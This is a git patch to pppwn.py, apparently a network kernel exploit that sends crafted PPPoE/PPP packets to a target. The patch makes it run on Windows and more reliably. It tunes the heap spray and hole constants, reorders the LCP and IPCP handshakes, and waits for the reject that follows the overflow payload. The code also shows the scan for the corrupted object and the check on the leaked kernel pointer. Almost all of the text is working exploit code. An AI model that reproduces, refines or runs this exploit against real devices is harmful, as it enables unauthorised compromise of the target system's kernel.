From ec9d54d5e2cc10135e0ecfd971c5fdec66829c7f Mon Sep 17 00:00:00 2001 From: Andy Nguyen Date: Wed, 1 May 2024 12:39:37 +0200 Subject: [PATCH] Make it work on Windows. --- pppwn.py | 66 +++++++++++++++++++++++++++++++------------------------- 1 file changed, 37 insertions(+), 29 deletions(-) diff --git a/pppwn.py b/pppwn.py index 7999bfe..e357eb2 100644 --- a/pppwn.py +++ b/pppwn.py @@ -149,12 +149,12 @@ def handler(self, pkt): class Exploit(): - SPRAY_NUM = 0x800 + SPRAY_NUM = 0x1000 PIN_NUM = 0x1000 CORRUPT_NUM = 0x1 HOLE_START = 0x400 - HOLE_SPACE = 0x4 + HOLE_SPACE = 0x10 LCP_ID = 0x41 IPCP_ID = 0x41 @@ -182,6 +182,20 @@ def kdlsym(self, addr): return self.kaslr_offset + addr def lcp_negotiation(self): + print('[*] Sending LCP configure request...') + self.s.send( + Ether(src=self.source_mac, + dst=self.target_mac, + type=ETHERTYPE_PPPOE) / PPPoE(sessionid=self.SESSION_ID) / + PPP() / PPP_LCP(code=CONF_REQ, id=self.LCP_ID)) + + print('[*] Waiting for LCP configure ACK...') + while True: + pkt = self.s.recv() + if pkt and pkt.haslayer(PPP_LCP_Configure) and pkt[ + PPP_LCP_Configure].code == CONF_ACK: + break + print('[*] Waiting for LCP configure request...') while True: pkt = self.s.recv() @@ -196,21 +210,23 @@ def lcp_negotiation(self): type=ETHERTYPE_PPPOE) / PPPoE(sessionid=self.SESSION_ID) / PPP() / PPP_LCP(code=CONF_ACK, id=pkt[PPP_LCP_Configure].id)) - print('[*] Sending LCP configure request...') + def ipcp_negotiation(self): + print('[*] Sending IPCP configure request...') self.s.send( - Ether(src=self.source_mac, - dst=self.target_mac, - type=ETHERTYPE_PPPOE) / PPPoE(sessionid=self.SESSION_ID) / - PPP() / PPP_LCP(code=CONF_REQ, id=self.LCP_ID)) + Ether( + src=self.source_mac, dst=self.target_mac, type=ETHERTYPE_PPPOE) + / PPPoE(sessionid=self.SESSION_ID) / PPP() / + PPP_IPCP(code=CONF_REQ, + id=self.IPCP_ID, + options=PPP_IPCP_Option_IPAddress(data=self.SOURCE_IPV4))) - print('[*] Waiting for LCP configure ACK...') + print('[*] Waiting for IPCP configure ACK...') while True: pkt = self.s.recv() - if pkt and pkt.haslayer(PPP_LCP_Configure) and pkt[ - PPP_LCP_Configure].code == CONF_ACK: + if pkt and pkt.haslayer( + PPP_IPCP) and pkt[PPP_IPCP].code == CONF_ACK: break - def ipcp_negotiation(self): print('[*] Waiting for IPCP configure request...') while True: pkt = self.s.recv() @@ -243,22 +259,6 @@ def ipcp_negotiation(self): id=pkt[PPP_IPCP].id, options=pkt[PPP_IPCP].options)) - print('[*] Sending IPCP configure request...') - self.s.send( - Ether( - src=self.source_mac, dst=self.target_mac, type=ETHERTYPE_PPPOE) - / PPPoE(sessionid=self.SESSION_ID) / PPP() / - PPP_IPCP(code=CONF_REQ, - id=self.IPCP_ID, - options=PPP_IPCP_Option_IPAddress(data=self.SOURCE_IPV4))) - - print('[*] Waiting for IPCP configure ACK...') - while True: - pkt = self.s.recv() - if pkt and pkt.haslayer( - PPP_IPCP) and pkt[PPP_IPCP].code == CONF_ACK: - break - def ppp_negotation(self, cb=None): print('[*] Waiting for PADI...') while True: @@ -670,6 +670,7 @@ def run(self): dst=self.target_mac, type=ETHERTYPE_PPPOE) / PPPoE(sessionid=self.SESSION_ID) / PPP(proto=0x4141)) + self.s.recv() sleep(0.0005) print('[+] Pinning to CPU 0...done') @@ -692,6 +693,13 @@ def run(self): (TARGET_SIZE - 4)) / PPP_LCP_Option(data=overflow_lle)))) + print('[*] Waiting for LCP configure reject...') + while True: + pkt = self.s.recv() + if pkt and pkt.haslayer(PPP_LCP_Configure) and pkt[ + PPP_LCP_Configure].code == CONF_REJ: + break + # Re-negotiate after rejection self.lcp_negotiation() self.ipcp_negotiation() @@ -732,7 +740,7 @@ def run(self): ICMPv6NDOptDstLLAddr(lladdr=self.source_mac)) if not corrupted: - print('[-] Scanning for corrupted object...failed') + print('[-] Scanning for corrupted object...failed. Please retry.') exit(1) print( @@ -756,7 +764,7 @@ def run(self): if (self.pppoe_softc_list & 0xffffffff00000fff != self.offs.PPPOE_SOFTC_LIST & 0xffffffff00000fff): - print('[-] Error leak is invalid.') + print('[-] Error leak is invalid. Wrong firmware?') exit(1) print('')